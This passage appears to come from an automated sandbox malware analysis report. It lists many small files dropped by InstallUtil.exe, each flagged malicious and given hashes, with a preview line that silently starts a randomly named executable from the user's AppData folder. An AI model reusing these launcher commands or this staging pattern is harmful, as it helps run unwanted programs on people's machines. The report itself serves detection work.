File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.0402397306175155
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5TOhNRT/JHykdan:fE1wkn236hNRTJyD
MD5:399C793E3D4A1A880E4324742C42E8B8
SHA1:D4B3F2F4437D3B46944AE8A379B892D8200F27A7
SHA-256:13B7C682BD3A607263E48D4FDB910CC1E2CB8560A590191526929FF9B3A2D3AB
SHA-512:5A5BA0D2982494A4F37CE4AFAAD74EA613B570F8F4012A139520587FEEF65D3AB40C0A80C08F8ACEC974959255DCB722CBD6BA24830F49FA99F003C71730716C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\6Q8Wwld29CZNDuak3WcfH07i.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.968970971515983
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J59IdC9GPMpfD4iFn:fE1wkn23DYMpr
MD5:69C903D8871AAC7F60037DDFAB47D61F
SHA1:77B9EB1655AB898804AAD92979E14FC899295AD4
SHA-256:E0C1C1715ED2410C97DDED81243A5573CFB1F59B49B9D05D4F45CC38FBF3F17A
SHA-512:A8233B41104140AADA45B09731A5225983FEB1273034BE97ED4BB8FCCF2F62557F9F679B09CD4BA352DBB91D29C3FBAFFB7EA5AC26AF678E3A93CD03D4A3A211
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\Xm54wLBRTMA3iYcjiLbASkwx.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.973181030290669
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5oQFd9S1UcgVLHSLNHFn:fE1wkn23oW/SecQcHF
MD5:9D10D5384B06A68AC0034D4A95D9EED1
SHA1:7ED1A78E236515776BED7846432EE51981F57936
SHA-256:4827155C9C91C7F2AC61392465B3631102CE9E396549B401587142F8FDBFF0CD
SHA-512:097F3AC8D7A7DFB144CDFDC58FC1876E03F5098FE81F76B8F64B646C7834A22346BEE565E8970F240D6F11D6937976226DD3F98780792E4BCF8AE2438822FD9B
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\M6twW38X7sVJZxeigqyEpnb7.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.985568754526515
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5PpdqIx7hJFn:fE1wkn23BUIpvF
MD5:61C9AF3F2668AA285F5EFC1B3E9B0E72
SHA1:971BB979A1C056A0BD6EB6903465B89DB6595FA6
SHA-256:C3C2A048693B18D857CC78AE3F6FD844C3B1D9CCED7D3705639454E8FF0C1870
SHA-512:F836795B449CF998C58DBAC049AE700C614B3D29D107020FDBCB0E162B1F68223EF64EF5BBB701D772097CB343F17D0546544F165E0882C119416C16D4813B04
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\jF6qc598AF3P3yZTYHAMeb77.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.951300233126511
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5Rzo8AE7cKjHFn:fE1wkn23VV9cKjl
MD5:F3F2B5646868BD27F7C8AF667CCB2D0D
SHA1:359DED8524FA752E884542232FE877F665CA7ED4
SHA-256:826F2A5CF8B7A4E1590478D1A953747BCC75F47CB8CED8C9B0BBDE8B99287B11
SHA-512:0CCE11D28FB7351AF37E6446345B8787C31D2147345CBC55D85E867EC071923F6E824AD9A31A354A327AEBE9080EABC114A6746021D2E84A35B6832938BF8AD0
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\4VMsRle8WT7FgN9W5d7QyVrl.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.956583247280138
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5hX1XSRGTodqOULACl:fE1wkn23BtXAqOSAs
MD5:5D8DB4788DDEAB6D0F3C3F740CB3E0A9
SHA1:BB40A512DC19D0095AA807F0952B28F02E9B12BD
SHA-256:F64790D60361A2662FC15BC0A4ADF6D5043D524B3BA551E6D898C960D231A607
SHA-512:D669E92411EB1BD4AF9E98A5B35A60B1F559ACA0C88C5F385AB027AB62B135143C4B9C8AFF0E06AE1BA1758CFC664ADD4D1A100A4A4AB90E975CE3A802A5D820
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\D2g51ebrTdw2dcv4PFU8OjS1.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.932880754187389
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5DUUCwzVHDUf:fE1wkn23h/tDUf
MD5:F1159E8CD93CAEF3C0607CA3B8DF5816
SHA1:2320344427CB0FC6148C9C0A3A071D538E20DADB
SHA-256:36C22A577696EBCF380A9585B00297CF5D60C5F27BFCA61CCA46DA6C79A9C0EE
SHA-512:A39FD4252A0953A3D9C3660C0F1557EB479DBA8B5622525CBDAAFF8FB6C4FE6514DD7D19367D24C99D3869F5DE5FF44136C43314ED4D1CD6B0286EB9BC20C110
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\fx3WDb5iITUt99f0bfiXKyIG.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5jIKdJaCeukmn:fE1wkn23Dduzm
                                                                                                                                                                                                                                MD5:1C1C33646B7C087776EA7DE5C6ED15C3
                                                                                                                                                                                                                                SHA1:2CB2745CF2A300B2BA924D7840705D97FF235E94
                                                                                                                                                                                                                                SHA-256:2F2FFA20A51120A5C02ADA0A76BB6DB5B537670E6FC8983E906C0AF37C2E8DCB
                                                                                                                                                                                                                                SHA-512:89EEB6ED99A89F62E038205F1057FC997753617E9414A349D8CBC98027B3686E8CC52FCA4EDBB9690007CA512CE8E6273165B2877990D035CF02242EA549E2C4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FhrkCEo26ZJ4quT9M55j4UZC.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.904269617215837
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Gu/FPf5ND/VpJF:fE1wkn23Gu1F
                                                                                                                                                                                                                                MD5:EFD457237925E08BE43F73FDBE8B6F14
                                                                                                                                                                                                                                SHA1:A9BE2B2EDA504998C712447D757A0205E68A93E3
                                                                                                                                                                                                                                SHA-256:9332C0D4C7455670A9D12E3EA4A7BF6201C33FB71D9498020F94BA16A6B2E7B7
                                                                                                                                                                                                                                SHA-512:D37A96D6C3DD92FE771349F933009EADB40646F804D0FC5E34D21B14CB90488484D2C2113D2D38212946287D4D7935112AE46C8A5C024C8D0AD63E68C782FAF3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\cOpSW0Wlkj1ce9hBfVKYpMs8.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.938538138615841
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5KfCUrEa6T4Al:fE1wkn23K/r2
                                                                                                                                                                                                                                MD5:9185D31C204C9E4EDDD9BF4C32EFDDA8
                                                                                                                                                                                                                                SHA1:456E9D64113EB1B31CCF161187F5B93127E0203F
                                                                                                                                                                                                                                SHA-256:007F376744051CCDABC2B29F8C623FBFAB6CFC7C6D4D954C9F328A32EC9B6A14
                                                                                                                                                                                                                                SHA-512:827A9C36E1BEAA67D875B9FDF432F21D6248D70C333DE144B81BF6B8F519FE9F97DA7E4D5A18F1D72555B133BC6F170BE3DEBC223E572DB926BAB054D9FBC501
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ozEb1N3TXSloIMlhTM4yt8ow.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.026941986008737
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5V0T/9cwoOpZrL:fE1wkn23A9cwHrL
                                                                                                                                                                                                                                MD5:D38204950968AC047AE59FA270E2CA2E
                                                                                                                                                                                                                                SHA1:F7C1C9E4D7CF3C377D88AFD7EF5C9B614F711483
                                                                                                                                                                                                                                SHA-256:FAF2D97FA7A7F33452D53FBFCF407A8FAD23D2BA7103E919A4A8560858B7A898
                                                                                                                                                                                                                                SHA-512:6C982BCF19E1F93489300C47A36FDF3032FA9FF1D68D309074A293E171F82DC56F921BB1BC09A6D28472B6EECD1D38F315A6CC90CBEE5EA23230E27DD4159620
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\0Qv6VcY5q9X7HaSkkLJaOzxN.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.927597740033761
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5QQ09gpHX0cpidiF:fE1wkn23QvsHEc8diF
                                                                                                                                                                                                                                MD5:FEC81708AB4C0F4274883A986C67D21B
                                                                                                                                                                                                                                SHA1:CF58068A57FB3FB4898BFEED4A77646AD9D9632E
                                                                                                                                                                                                                                SHA-256:DECFCA1A5D06808B2FCF770B188EE6FD17569FDD317D2F4E7A67D6613D9EA531
                                                                                                                                                                                                                                SHA-512:0E423644249C55FA3F555A0EAF407918006F8CA35A284E6CE01E1771745CF1BED9B98DDF95BA8F62A47DC1C99F9AE5AD2BA2B90516C25252A99A8BC31F5C7A07
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\51lQApdWbXELTdretyNDFkhG.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558924
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5vROG7E1yLl:fE1wkn23pOP0l
                                                                                                                                                                                                                                MD5:BB95278939C6D731E9F4B86E02662014
                                                                                                                                                                                                                                SHA1:E97FF9F301C8DA7A7BF336258B20D58B5D2FBC5D
                                                                                                                                                                                                                                SHA-256:E026730DC1C6264F77E2756AB0472BF2FD79A5EC92FF4C6E43EA7C5062C9E728
                                                                                                                                                                                                                                SHA-512:A76DE043148DB9948CEA8640431DD16B0918381E13C17037382BD842C03112165C52E843931C6C484514A03502D9564E665AB9A1B2D46D3B938B5E3466221E71
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JuskGZco4xffB5CawcWIcxFf.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.124838906329946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5iH7mA6ysL:fE1wkn23iCAZsL
                                                                                                                                                                                                                                MD5:C6006A8E2B0328D9ACFC44390854EA10
                                                                                                                                                                                                                                SHA1:D3848EBAF4EDEBD8FEC8E83891AD1A540D5FB54C
                                                                                                                                                                                                                                SHA-256:8331F4D213AF40BBF714572307FAAB3CBDA7C0DB4C31B044A2AE847A19F54D0A
                                                                                                                                                                                                                                SHA-512:E3078AB88DC795569F4EF61F846A845DAEA724CB480ECF6B853E79CEE62C1FC9A1E155DA246D2483204682E38C2B74ADC1513B5CEA09AA31145AC05CBD89942D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\GU2AoS4KXuNbCT975QhkMBWI.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.755132022209267
                                                                                                                                                                                                                                Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5KkGpVBOQbpmn:fE1wkn23KzBOQbpm
MD5:D0D5C9C4CE8CA1933AE5D60B5A1C02A4
SHA1:8E2231A80DAFA71CBA482798C84EF90CF8F33DEB
SHA-256:B1F0E628EB612167ECA635D45CAF5466C34DED2454CEA0C5BF38009CF6893581
SHA-512:3EC27EA9B33F81424C0D7AB31314B21804A4840C8C64AF5384891BCCCDE6E229AA73C6C87C5A56CDFF64EAB9ECF186A7211A52761056F864C8FDC448484F40AE
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\oCvcL0BwU8vcPCyx5xUoBc3Y.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.956797786124995
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5uX3XpgJjAd/kdan:fE1wkn23unX2OpD
MD5:33F8EBF5DDD730FC6F5B97D224665EDF
SHA1:F3E0F763D1486B72752494A17875D7A73A4B0E54
SHA-256:7AAFBB217C4D72C0F09A4A2CC74AA4BC20AB19DA11EEF780EC8B06C0A0871A82
SHA-512:5F98FD2A333BFC9BCDBD6CEB39860D30622FEE6503634B08C5036A11545D3487F98E34754C61470549AF73DF7193FE447BAAE9241431C17C5E43302906720A3E
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\K8iQZVR1QcKL7tq874t7OVK9.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.933255124462214
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5gtcqtNW7CsSq0sn:fE1wkn23gt9tEUqL
MD5:B7ADE79097379F6E02F442938A1AE5D7
SHA1:BE08C8B3370A6FAF84D071731B4A656A7BD7F21F
SHA-256:3B46B8E18AFE082CABE833BA59CFFAB884EC461A7F3E2B8164B4247FD8E921B2
SHA-512:47C0AC8D1DD86B611F30E64FBD51D44BC87FB78058ABAA4DDD4B8091808306882190B6D5705BF5B6EDE6C0E0532A45098B72D37A5BF1BB7A7430881AD97D8FCD
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\E4yp79Qa2EvDhsHlzSxMTwUz.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.916657341451682
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5ddIOh2cz298xiF:fE1wkn23fIOhY98xiF
MD5:9112DBC5BA6248E997A63FF39F75FFEE
SHA1:02E39717E21834D088F5928EDFF2634760152D86
SHA-256:92B9B57311382A18CE3EEECE150C76A39C8B71D99397FE60CA9B8FF2AAE9FEBE
SHA-512:6D325FA555C4EA338B7585C14E84B3C9FB79212BB29B55C4C79DD4605C5769688ECFD4201CE6CC4BA71AEE2FD55AACF3B46B20286A6DC91A263E216A406D3FB8
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\x8JusOpOPD2Ef7JVSoCYQS8k.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.001242230569439
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5UTxrLJSkdan:fE1wkn23UTFJSD
MD5:911A1FE42A52E8DA0F2D4ADC1D8A4227
SHA1:31E41E38D7AA01FF564539F863C9439B86F3AD6B
SHA-256:CDABE4753F37EFA37DE9E94B56C27EE068B891AC8D741D0A226E51DEB8AF9EC4
SHA-512:4A329A5D7EAF49ED0883E224E36E70B70C7BE7E5E1B4E72DAEF73C32B90FAF81D01A4CFF4D9751AECCF508AFB9928FA292983FEABD8CA6AC6968E9F37DA98EF3
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\13TZhjPb0HxkQlPqajCRkSnB.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.008896877344438
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5XvMdb6vDiiL:fE1wkn23EdbciiL
MD5:6F2237053C7347EB2A5F30D40E63AC4E
SHA1:30CDF403ECEDDA8D5F609B3F3A9DFF0FEDB62CFB
SHA-256:4D815D26469460CAF70A6109E7B8354EFBEC7434EBEAA40B57457AF9EE7235EB
SHA-512:B9CDEA29B5D2A1BB3DE4E278D84BFB62144131501BB0490818CF41135C078F3DDD6710740CD2DA5C8AF4F12C64D9AE4DE885AFCC18AF9B285AC0E8E38BC46711
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\2F22VRFSBNYWhRCIxmDEOfGG.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.887671834205306
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5phkLYhZkCFn:fE1wkn23PkUF
MD5:674D2FE7A1739E5F0BC8ACC0F6BF25A5
SHA1:0CA3259EF519809ED64B88A6B8A8E5A86C6A7B7D
SHA-256:4D583D77B160D42DA02848FEE70AE0FCA34C645B53A63550457F74F99497DF0E
SHA-512:69C4F4A36C85BB6CF2695026E05B29C3551EE8849BBA33EEEBE635BCF2DFB98E04DA155559E0B2FAC03AFBAF9D4689A138AB9BC610035341D5CAEFB51CEC80FF
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\LDXcH6E4Iv1SvrK1qy7oaACH.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.921940355605309
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5D2NMWPsqV+XLvn:fE1wkn23iNMIsqIbv
MD5:5C839D92C0A67A1A052E9927AECF5062
SHA1:97041C96BD42B04F6092C80E1BCD5B3FCCC97F54
SHA-256:8F0F9F64F9DB9208563B0E4DB428A0AAD74AB94A10E54FE2ED20517F8575CDC9
SHA-512:5F0DBE6BEC4EF667406F9AA9EA561DD172355310BE619118592CA2D6E3632C7B2A7F57BEBE637A029FB2AE77C63050BAE1E92513D060D65B76F69E471A9902A9
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\fnKomgqhEl3jQ0OfLzCfcoX2.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.990851768680142
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J53Hjlj7B4m:fE1wkn23t7B4m
MD5:894D7B18B1E1EF3EF54C866F066BE4E8
SHA1:940408A8037AD92E39B4CAFF2081C13035A587C7
SHA-256:BAA3765D1A1D0A6145E8A05832C6426C42A7395E1750008CA21322C8F2BF71B9
SHA-512:0A2382B12D708059AA4E61DF806368F482886980B43BA9D52B655CCDEACE0E4A4FE698E13E8D9CDE1F2761620E81712E9872CE24E8F52199F2B9002094ED0CA8
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\RTFxFt6JQGyMVAVqY4EGgVDP.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.929128619506405
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5Ug/hSeAoyG4/kdan:fE1wkn23UgpD9QD
MD5:259F7F29470081333B6C7716B1B3033D
SHA1:AD21E7D34E501262693F0141BE17610839FC7DC7
SHA-256:61A64EAB02F9CF69DDF7C0FFA22A77AF5C35CB288C644C01ED40CEBB7CED9F38
SHA-512:23DF13763403034588C733C840E19461B8E32E00F0A493372B165412B511DDA7CC67ECB40D44041C797CE506EFBF9455AAED3129716A98AB4B5E2A238011E332
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\qEZDdAWnBbu94XDsWbevAW3Z.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.898612232787385
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5nCdriwivSVfUsn:fE1wkn23CtMSVss
                                                                                                                                                                                                                                MD5:133D5B8E1127EC52BA7B59DA42951A6D
                                                                                                                                                                                                                                SHA1:B70D3A33C9230A3C442E00913F3AE2D8A5999F90
                                                                                                                                                                                                                                SHA-256:46D05A3BAFBE25C18327FFA6BF39F178D8D721D7EE6110C1D4C57CF9AC23712C
                                                                                                                                                                                                                                SHA-512:4B3FA44FA2BEC8EE620F5414594DD20282190BCE29A79D39F44F6D27753370B20FB447E130476AC54A1CCB76DAB5E9767AA8B59D0B92865DAABF1B9F69913A90
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\BOLsN3rxBHAIGUMuUJ7tVz6n.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.054480167601347
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rSZ+O/AUn:fE1wkn23ZO/AU
                                                                                                                                                                                                                                MD5:F5FD60665038AE99AD9C7961AD33FE47
                                                                                                                                                                                                                                SHA1:9BE80579EB9CC47234BFB94FE86394BD6F787964
                                                                                                                                                                                                                                SHA-256:D766E518A4E08FAC6883D3218F1763E486B5C4CC023EE7D2DC46DFB3FAA993A2
                                                                                                                                                                                                                                SHA-512:E4FEEBA0B178200648748101AE2D56E10042CB6E0E3D8853006B458A0A13D3DAA7331C2D8DD34B5F2E7B2D347BAC086A57675F62C9A9C333EAB25BB8C6916CCC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\N7Z4zCqKy1jgGt5mkoShe6Ob.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.906441464173445
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5RqAzOuFpdiykdan:fE1wkn23BzOuBD
                                                                                                                                                                                                                                MD5:5B7AA6EBC444B8266FB1910334F77E20
                                                                                                                                                                                                                                SHA1:D21AD34490EFED87ECAA355EF195DA14B8766F62
                                                                                                                                                                                                                                SHA-256:37C4B060E502598A152A50F3DB5A72A2EFBBF7B09DD1F8456816AEAFF1A140AA
                                                                                                                                                                                                                                SHA-512:7FE0A5BD6E8873E6D4138FEE41CD8DCEFD4AF12E3F59349F3323B5D9496D806DE3C9F1A2736F4D8DD260DBE687D21C37FEFEB4170380D9FCA28F555819F7D40B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tOekaWBMtMvKgKTpn1rNSApR.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.003613863190812
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5iAUcfxidFCHF:fE1wkn23iTcfwdFCl
                                                                                                                                                                                                                                MD5:62DFD3FA9A5377233A45FA415904846F
                                                                                                                                                                                                                                SHA1:7DF9692FCEDAFE4B2BF3FE46B8122F44AF51B562
                                                                                                                                                                                                                                SHA-256:26446423A6336C695D27619D86DD08C2F61A484EF1AEDD5254B49D9370938C4E
                                                                                                                                                                                                                                SHA-512:A7CF0FE52D15FF0B3525D845D7A96372A2EA6DFC5A492D7B986BEEDAFC35F1EAA6982C47B8E34F9661002A34CDDF4C0D00E96D19CBA7329486D558409E2C8182
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\G3AqZmqYns0GbyzqMuR8nWTh.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.83498383386618
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rcJ3OO32E/30dmn:fE1wkn232B2rm
                                                                                                                                                                                                                                MD5:FB6CFFA2D87A59A27D4DF4F55ED19F60
                                                                                                                                                                                                                                SHA1:FB6DCD5F808B584F6FB4E95165533443E3BC0964
                                                                                                                                                                                                                                SHA-256:E8FF27275DE00E35F75ABD369343EEAB04865481CA3730C7303B424E0526386F
                                                                                                                                                                                                                                SHA-512:AE4BE93AB5D6A1783C6E772CF14FFEF77F6E1442F3AEB4C5682CA7A88088C866F94D58E5784828492142B192F213B781D4AD0F9485F2C2AE3224571B326CAB34
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\N9lxfrZyrFBnT9kkfNS8cZTT.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.893329218633757
                                                                                                                                                                                                                                Encrypted:false
